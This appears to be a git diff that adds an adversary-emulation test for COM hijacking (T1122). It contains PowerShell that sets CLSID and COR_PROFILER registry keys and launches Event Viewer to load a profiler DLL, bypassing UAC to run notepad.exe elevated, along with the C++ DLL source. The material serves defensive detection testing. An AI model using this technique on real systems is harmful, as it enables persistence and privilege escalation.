diff --git a/.gitignore b/.gitignore
index 728f7463..b07d4684 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,8 +2,24 @@
.DS_Store
.vscode
.atom
+
atomic-red-team/enterprise-attack.json
+# Compiled Object files
+*.slo
+*.lo
+*.o
+*.obj
+
+# vs logs
+*.tlog
+*.log
+
+# Precompiled Headers
+*.gch
+*.pch
+
+
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
diff --git a/atomics/T1122/T1122.yaml b/atomics/T1122/T1122.yaml
new file mode 100644
index 00000000..99ca39ce
--- /dev/null
+++ b/atomics/T1122/T1122.yaml
@@ -0,0 +1,50 @@
+---
+attack_technique: T1122
+display_name: Component Object Model (COM) Hijacking
+
+atomic_tests:
+- name: COM Hijack Leveraging .NET profiler DLL
+ description: |
+ Creates environment variables and CLSID to enable a .NET profiler. The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ file_name:
+ description: profiler DLL
+ type: Path
+ default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
+ clsid_guid:
+ description: custom clsid guid
+ type: String
+ default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ #{file_name} must be present
+ prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
+ if (Test-Path #{file_name}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+ New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+ New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+ Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+ START MMC.EXE EVENTVWR.MSC
+ Start-Sleep 5
+ cleanup_command: |
+ Write-Host "Removing registry keys" -ForegroundColor Cyan
+ Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
+ Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
\ No newline at end of file
diff --git a/atomics/T1122/bin/T1122x64.dll b/atomics/T1122/bin/T1122x64.dll
new file mode 100644
index 00000000..d198b0aa
Binary files /dev/null and b/atomics/T1122/bin/T1122x64.dll differ
diff --git a/atomics/T1122/src/atomicNotepad.sln b/atomics/T1122/src/atomicNotepad.sln
new file mode 100644
index 00000000..81eab91d
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "atomicNotepad", "atomicNotepad\atomicNotepad.vcxproj", "{53529597-67F0-4159-AD9B-DE118E7C1A0D}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x64.ActiveCfg = Debug|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x64.Build.0 = Debug|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x86.ActiveCfg = Debug|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Debug|x86.Build.0 = Debug|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x64.ActiveCfg = Release|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x64.Build.0 = Release|x64
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x86.ActiveCfg = Release|Win32
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {C1ED96A7-1052-454C-9B56-302FD3426CCC}
+ EndGlobalSection
+EndGlobal
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj
new file mode 100644
index 00000000..fdcc818c
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj
@@ -0,0 +1,169 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {53529597-67F0-4159-AD9B-DE118E7C1A0D}
+ Win32Proj
+ atomicNotepad
+ 10.0
+
+
+
+ DynamicLibrary
+ true
+ v142
+ Unicode
+
+
+ DynamicLibrary
+ false
+ v142
+ true
+ Unicode
+
+
+ DynamicLibrary
+ true
+ v142
+ Unicode
+
+
+ DynamicLibrary
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ true
+ WIN32;_DEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ _DEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ true
+ true
+ false
+
+
+
+
+ Use
+ Level3
+ true
+ true
+ true
+ NDEBUG;ATOMICNOTEPAD_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
+ true
+ pch.h
+
+
+ Windows
+ true
+ true
+ true
+ false
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters
new file mode 100644
index 00000000..d4f9881b
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.filters
@@ -0,0 +1,33 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user
new file mode 100644
index 00000000..88a55094
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/atomicNotepad.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/atomics/T1122/src/atomicNotepad/dllmain.cpp b/atomics/T1122/src/atomicNotepad/dllmain.cpp
new file mode 100644
index 00000000..3aa1a7ca
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/dllmain.cpp
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+
+BOOL APIENTRY DllMain(HMODULE hModule,
+ DWORD ul_reason_for_call,
+ LPVOID lpReserved
+)
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ WinExec("notepad.exe", SW_SHOWNORMAL);
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
diff --git a/atomics/T1122/src/atomicNotepad/framework.h b/atomics/T1122/src/atomicNotepad/framework.h
new file mode 100644
index 00000000..54b83e94
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/framework.h
@@ -0,0 +1,5 @@
+#pragma once
+
+#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
+// Windows Header Files
+#include
diff --git a/atomics/T1122/src/atomicNotepad/pch.cpp b/atomics/T1122/src/atomicNotepad/pch.cpp
new file mode 100644
index 00000000..64b7eef6
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/pch.cpp
@@ -0,0 +1,5 @@
+// pch.cpp: source file corresponding to the pre-compiled header
+
+#include "pch.h"
+
+// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
diff --git a/atomics/T1122/src/atomicNotepad/pch.h b/atomics/T1122/src/atomicNotepad/pch.h
new file mode 100644
index 00000000..885d5d62
--- /dev/null
+++ b/atomics/T1122/src/atomicNotepad/pch.h
@@ -0,0 +1,13 @@
+// pch.h: This is a precompiled header file.
+// Files listed below are compiled only once, improving build performance for future builds.
+// This also affects IntelliSense performance, including code completion and many code browsing features.
+// However, files listed here are ALL re-compiled if any one of them is updated between builds.
+// Do not add files here that you will be updating frequently as this negates the performance advantage.
+
+#ifndef PCH_H
+#define PCH_H
+
+// add headers that you want to pre-compile here
+#include "framework.h"
+
+#endif //PCH_H
diff --git a/atomics/T1122/src/x64/Release/atomicNotepad.dll b/atomics/T1122/src/x64/Release/atomicNotepad.dll
new file mode 100644
index 00000000..d198b0aa
Binary files /dev/null and b/atomics/T1122/src/x64/Release/atomicNotepad.dll differ